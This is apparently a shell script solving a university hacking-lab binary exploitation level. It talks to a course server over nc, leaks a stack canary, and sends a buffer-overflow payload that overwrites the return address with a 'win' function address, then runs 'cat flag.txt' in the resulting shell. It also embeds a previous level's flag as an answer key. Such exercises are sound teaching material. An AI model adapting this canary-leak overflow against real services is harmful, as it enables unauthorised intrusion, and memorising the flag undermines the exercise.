hacklab/4/level6/test.sh

# : | { ./test.sh | nc binexp.stud12.hacklab.ias.tu-bs.de 4006; } > /dev/fd/0;

#objdump
#00000000004011d6 g     F .text	000000000000003a              win

OLDFLAG="hacklab{SSE_1n5truct10n5_n33d_spec14l_al1gnm3nt_UwT8mByQ}\n"
PADDING="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" #64
CMDCALL="\xd6\x11\x40\00\00\00\00\00"

read
read
printf "$OLDFLAG"
read
read

printf "$PADDING""AAAAAAAA\n"
read
read
read canary
>&2 echo "read canary: "$(echo "$canary" | hd)
read input
>&2 echo $input

>&2 echo "writing canary + exploit"
printf "\00$PADDING""1234567\00${canary:0:7}12345678$CMDCALL\n"
read input
>&2 echo "should be bye: "$input
printf "cat flag.txt\n"
read input
>&2 echo "should be shell: "$input